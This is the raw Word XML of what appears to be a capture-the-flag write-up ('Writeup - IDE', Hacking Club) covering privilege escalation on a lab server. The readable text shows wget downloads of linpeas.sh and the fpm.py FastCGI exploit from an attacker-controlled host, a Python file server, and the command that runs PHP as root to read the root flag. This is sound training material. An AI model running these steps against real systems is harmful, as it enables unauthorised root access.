                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5857875" cy="46863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compromised server, we run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B8">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 /tmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B9">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wget http://&lt;IP-VPN&gt;/linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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chmod +x linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BB">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./linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BC">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BD">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546600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="59" name="image12.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image12.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="45466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cof9zm34ojsl" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="4241800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="65" name="image17.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image17.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="42418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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.1uk8ya8kmshg" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FastCGI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C0">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId29">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://book.hacktricks.xyz/pentesting/9000-pentesting-fastcgi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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According to HackTricks, we can obtain RCE as the root user via FastCGI.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C2">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First, we will download the file to our machine:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C3">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId30">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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wget https://gist.githubusercontent.com/phith0n/9615e2420f31048f7e30f3937356cf75/raw/ffd7aa5b3a75ea903a0bb9cc106688da738722c5/fpm.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C5">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6">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7">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>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C8">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076700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="62" name="image15.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image15.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="594360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C9">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start a Python server on our machine to send </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fpm.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the compromised server:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CA">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sudo python -m SimpleHTTPServer 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CB">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343400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="57" name="image14.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image14.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="43434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On the compromised server:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CD">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cd /tmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CE">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wget http://&lt;IP-VPN&gt;/fpm.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CF">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0">
      <w:pPr>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19600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="71"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59436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will create an empty file → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">test.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, since our exploit requires an existing file in the filesystem:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D2">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touch /var/www/html/test.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D3">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Now we execute:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python fpm.py localhost /var/www/html/test.php -c "&lt;?php echo file_get_contents('/root/root.txt'); ?&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D5">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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And we get our root flag =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D6">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="4445000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="56" name="image7.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image7.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="44450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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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sectPr>
      <w:headerReference r:id="rId35" w:type="default"/>
      <w:headerReference r:id="rId36" w:type="first"/>
      <w:headerReference r:id="rId37" w:type="even"/>
      <w:footerReference r:id="rId38" w:type="default"/>
      <w:footerReference r:id="rId39" w:type="first"/>
      <w:footerReference r:id="rId40" w:type="even"/>
      <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
      <w:pgMar w:bottom="1440" w:top="0" w:left="1440" w:right="1440" w:header="0" w:footer="85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IBM Plex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IBM Plex Sans SemiBold">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F">
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:pBdr>
        <w:top w:space="0" w:sz="0" w:val="nil"/>
        <w:left w:space="0" w:sz="0" w:val="nil"/>
        <w:bottom w:space="0" w:sz="0" w:val="nil"/>
        <w:right w:space="0" w:sz="0" w:val="nil"/>
        <w:between w:space="0" w:sz="0" w:val="nil"/>
      </w:pBdr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="-1276" w:right="289" w:firstLine="1276"/>
      <w:jc w:val="both"/>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:shd w:fill="9a309b" w:val="clear"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">© 2026 Hacking Club | All rights reserved </w:t>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">          </w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">                                          Page </w:t>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>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righ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rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rtl w:val="0"/>
      </w:rPr>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DA">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="12"/>
    <w:bookmarkEnd w:id="12"/>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-866769</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>95250</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="719138" cy="232221"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="66" name="image2.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image2.jpg"/>
                  <pic:cNvPicPr preferRelativeResize="0"/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:srcRect b="28627" l="0" r="-7644" t="36271"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="719138" cy="232221"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect"/>
                  <a:ln/>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:anchor>
      </w:drawing>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DB">
    <w:pPr>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:color w:val="000000"/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rtl w:val="0"/>
      </w:rPr>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DC">
    <w:pPr>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr/>
      <w:pict>
        <v:shape id="WordPictureWatermark1" style="position:absolute;width:617.76pt;height:793.4866141732284pt;rotation:0;z-index:-503316481;mso-position-horizontal-relative:margin;mso-position-horizontal:absolute;margin-left:-73.98425196850394pt;mso-position-vertical-relative:margin;mso-position-vertical:absolute;margin-top:-1.2459055118110236pt;" alt="" type="#_x0000_t75">
          <v:imagedata cropbottom="0f" cropleft="0f" cropright="0f" croptop="0f" r:id="rId2" o:title="image3.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D">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-942969</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>0</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7820025" cy="10085729"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="54" name="image1.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image1.png"/>
                  <pic:cNvPicPr preferRelativeResize="0"/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:srcRect b="8816" l="0" r="0" t="0"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="7820025" cy="10085729"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect"/>
                  <a:ln/>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:anchor>
      </w:drawing>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
              <a:graphic>
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr/>
                    <wps:cNvPr id="2" name="Shape 2"/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="2390550" y="2454150"/>
                        <a:ext cx="5910900" cy="2651700"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </wps:spPr>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000">
                          <w:pPr>
                            <w:spacing w:after="120" w:before="480" w:line="275.9999942779541"/>
                            <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                            <w:jc w:val="center"/>
                            <w:textDirection w:val="btLr"/>
                          </w:pPr>
                          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                            <w:rPr>
                              <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
                              <w:b w:val="0"/>
                              <w:i w:val="1"/>
                              <w:smallCaps w:val="0"/>
                              <w:strike w:val="0"/>
                              <w:color w:val="ffffff"/>
                              <w:sz w:val="48"/>
                              <w:vertAlign w:val="baseline"/>
                            </w:rPr>
                            <w:t xml:space="preserve">Writeup - </w:t>
                          </w:r>
                          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                            <w:rPr>
                              <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
                              <w:b w:val="0"/>
                              <w:i w:val="1"/>
                              <w:smallCaps w:val="0"/>
                              <w:strike w:val="0"/>
                              <w:color w:val="ffffff"/>
                              <w:sz w:val="48"/>
                              <w:vertAlign w:val="baseline"/>
                            </w:rPr>
                            <w:t xml:space="preserve">IDE</w:t>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </wps:txbx>
                    <wps:bodyPr anchorCtr="0" anchor="ctr" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
                      <a:noAutofit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:drawing>
            <wp:anchor allowOverlap="1" behindDoc="0" distB="45720" distT="45720" distL="114300" distR="114300" hidden="0" layoutInCell="1" locked="0" relativeHeight="0" simplePos="0">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>-349240</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5767071</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6696075" cy="3009472"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="52" name="image22.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image22.png"/>
                      <pic:cNvPicPr preferRelativeResize="0"/>
                    </pic:nvPicPr>
                    <pic:blipFill>
                      <a:blip r:embed="rId2"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </pic:blipFill>
                    <pic:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="6696075" cy="3009472"/>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252"/>
        <w:tab w:val="right" w:leader="none" w:pos="8504"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:pict>
        <v:shape id="WordPictureWatermark2" style="position:absolute;width:617.76pt;height:793.4866141732284pt;rotation:0;z-index:-503316481;mso-position-horizontal-relative:margin;mso-position-horizontal:center;mso-position-vertical-relative:margin;mso-position-vertical:center;" alt="" type="#_x0000_t75">
          <v:imagedata cropbottom="0f" cropleft="0f" cropright="0f" croptop="0f" r:id="rId1" o:title="image3.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Normal" w:default="1">
    <w:name w:val="normal"/>
  </w:style>
  <w:style w:type="table" w:styleId="TableNormal" w:default="1">
    <w:name w:val="Table Normal"/>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footer" Target="footer3.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/carlospolop/PEASS-ng/tree/master/linPEA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6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId25" 